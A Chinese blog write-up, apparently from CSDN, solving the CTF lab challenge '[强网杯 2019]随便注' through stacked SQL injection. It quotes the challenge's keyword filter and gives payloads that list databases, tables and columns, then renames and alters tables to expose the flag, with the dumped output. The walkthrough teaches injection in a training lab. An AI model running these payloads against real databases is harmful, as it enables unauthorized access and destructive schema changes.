[强网杯 2019]随便注

最新推荐文章于 2024-06-08 11:59:32 发布
最新推荐文章于 2024-06-08 11:59:32 发布
阅读量157 收藏
点赞数
分类专栏: web SQL注入 buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Is_Linmouren/article/details/108788704
版权
web 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
buuctf
4 篇文章 0 订阅
订阅专栏
SQL注入
2 篇文章 0 订阅
订阅专栏

[强网杯 2019]随便注

知识点

  • 堆叠注入

尝试了一下单引号闭合;存在堆叠注入;过滤了

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);右键看源码有一个注释

<!-- sqlmap是没有灵魂的 -->

于是试了下sqlmap,可以跑出数据库跑不出表;

动手:payload:`1’;show database;show tables;

array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}
_________________________________________________________________________________________
array(1) {
  [0]=>
  string(11) "ctftraining"
}

array(1) {
  [0]=>
  string(18) "information_schema"
}

array(1) {
  [0]=>
  string(5) "mysql"
}

array(1) {
  [0]=>
  string(18) "performance_schema"
}

array(1) {
  [0]=>
  string(9) "supersqli"
}

array(1) {
  [0]=>
  string(4) "test"
}
_________________________________________________________________________________________
array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

可以看见数据库;和当前数据库的表都出来了.

再用 1’; show columns from words ;和 1’; show columns from 1919810931114514;看一下表里面的字段

//woeds
array(6) {
  [0]=>
  string(2) "id"
  [1]=>
  string(7) "int(10)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}
array(6) {
  [0]=>
  string(4) "data"
  [1]=>
  string(11) "varchar(20)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

 0';show columns from `1919810931114514`;

实际测试的时候发现纯数字的表要加上``符号

//1919810931114514
array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

看一下大概知道我们现在语句查询的表是woeds,flag一个在1919810931114514这个表里面.

猜测一下查询语句大概是:select * form words where id = $_GET("inject")';

接下来就是要想法办法去查零位一张表里面的东西

1.将words表改名为word1或其它任意名字

2.1919810931114514改名为word

3.将新的word表插入一列,列名为id

4.将flag列改名为data

我们的payload

1';rename table words to word1;rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

直接再查个1就可以得到flag

L1nr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
强网杯 2019]随便
qq_53689523的博客
02-17 149
强网杯2019随便;堆叠入,禁select;sql入,sqlmap
强网杯2019随便!!sqllibs 第11和12关 postsqlmap直接嗦??堆叠入来看看!!!!
最新发布
helloKittywz的博客
06-08 780
看到了数据库我们在看表,还是一样的加参数 -tables。前面都是get型的入,我们现在来看看post的sql入。我在经过简单的尝试过后,也成功的登录了,看看我下面的。sqlamp中加上参数-r “路径”来进行入。的,看能不能来进行登录,这点就需要我们来进行。post的sql入的话,我们在看见了。,这点跟get入不一样。相结合来进行操作,然后把。放到一个记事本中,然后在。post的话我们要跟。
强网杯 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 1394
题目简介 题目名称:[强网杯 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2019 第三届强网杯线上赛.zip
12-17
强网杯
sqlmap使用方法
tothemoon的博客
03-03 436
直接进入正题: 环境:python2.7 python2 sqlmap.py -u “这里插入url地址” --data=“这里是入点的变量名=1” python2 sqlmap.py -u “这里插入url地址” --data=“这里是入点的变量名=1” --dbs 爆数据库库名 python2 sqlmap.py -u “这里插入url地址” --data=“这里是入点的变量名=1...
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
SQL Injection8(堆叠入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
BUU__[强网杯 2019]随便_题解
风过江南乱的博客
04-28 2206
拿到题目,很明显的sql入题目。
BUUCTF WEB 菜比的做题总结
不会CTF的博客
07-11 1126
目录前言:BUUCTF web WarmUp[强网杯 2019]随便1.mysql 预处理语句 然后加 char ascii码绕过过滤2.同样是mysql预处理 但是用的是十六进制的方式 payload比第一个师傅要简单3.这个师傅的姿势是最骚的,也是比较容易读懂的 前言: 学了这么久的web基础,发现做题和看知识还是有很大区别,基础越扎实 web就越得心应手,各种师傅的姿势实在太多了!学习!! BUUCTF web WarmUp 一天一道CTF题目,冲!!!! F12 ------------》 so
BUUCTF学习笔记-随便
weixin_42271850的博客
03-08 3043
BUUCTF学习笔记-随便 时间:2020/03/05 考点:堆叠入、SQL预编译语句。          打开发现是一个输入查询框,右键查看代码发现里面又一个提示sqlmap是没有灵魂的。估计这一题是SQL入,但提示应该不能直接用sqlmap,但还是先去尝试一下。  &nbsp...
攻防世界-supersqli
m0_63563528的博客
03-28 508
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值